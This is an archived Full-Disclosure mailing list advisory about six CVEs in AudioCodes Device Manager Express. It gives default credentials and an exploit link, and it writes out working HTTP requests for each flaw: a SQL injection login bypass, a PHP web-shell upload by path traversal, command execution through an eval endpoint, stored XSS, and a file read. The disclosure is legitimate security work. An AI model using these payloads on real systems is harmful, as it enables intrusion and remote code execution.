lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAKR_-zw4wThWCqs4bf_0x-_fe2ZPiR40ZEcpU4MR=sXBQW94-g@mail.gmail.com>
Date: Fri, 17 Feb 2023 16:06:12 +0100
From: Eric Flokstra <erp.flokstra@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Multiple vulnerabilities in Audiocodes Device Manager Express

# Product Name: Device Manager Express
# Vendor Homepage: https://www.audiocodes.com
# Software Link:
https://www.audiocodes.com/solutions-products/products/management-products-solutions/device-manager
# Version: <= 7.8.20002.47752
# Tested on: Windows 10 / Server 2019
# Default credentials: admin/admin
# CVE-2022-24627, CVE-2022-24628, CVE-2022-24629, CVE-2022-24630,
CVE-2022-24631, CVE-2022-24632
# Exploit: https://github.com/00xEF/Audiocodes-Device-Manager-Express

AudioCodes' Device Manager Express features a user interface that enables
enterprise network administrators to set up, configure and update up to 500
400HD Series IP phones in globally distributed corporations.

----------------
CVE-2022-24627: An unauthenticated SQL injection exists in the p parameter
of the login form.
----------------
POST /admin/AudioCodes_files/process_login.php HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
Content-Type: application/x-www-form-urlencoded

username=admin&password=&domain=&p=%5C%27or+1%3D1%23


----------------
CVE-2022-24628: An authenticated SQL injection exists in the id parameter
of IPPhoneFirmwareEdit.php
----------------
/admin/AudioCodes_files/IPPhoneFirmwareEdit.php?action=download&id=-1338'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-


----------------
CVE-2022-24629: A remote code execution vulnerability exists via path
traversal in the dir parameter of the file upload functionality .
----------------
POST /admin/AudioCodes_files/BrowseFiles.php?type= HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="dir"

C:/audiocodes/express/WebAdmin/admin/AudioCodes_files/ajax/
-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="type"

-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="myfile"; filename="ajaxJabra.php"
Content-Type: application/x-php

<?php echo shell_exec($_GET['x']); ?>


-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="Submit"

Upload
-----------------------------119140522224988540294045582807--


----------------
CVE-2022-24630: A remote command execution exists in an undocumented eval
function in BrowseFiles.php
----------------
POST /admin/AudioCodes_files/BrowseFiles.php?cmd=ssh HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

ssh_command=dir+C:


----------------
CVE-2022-24631: A Persistent Cross-Site Scripting exists in the desc
parameter in ajaxTenants.php
----------------
POST /admin/AudioCodes_files/ajax/ajaxTenants.php HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

action=save&id=1&name=Default&desc=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&subnet=&isdefault=true


----------------
CVE-2022-24632: A path traversal vulnerability exists in the view parameter
of the file download functionality in BrowseFiles.php
----------------
/admin/AudioCodes_files/BrowseFiles.php?view=C:/windows/win.ini
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ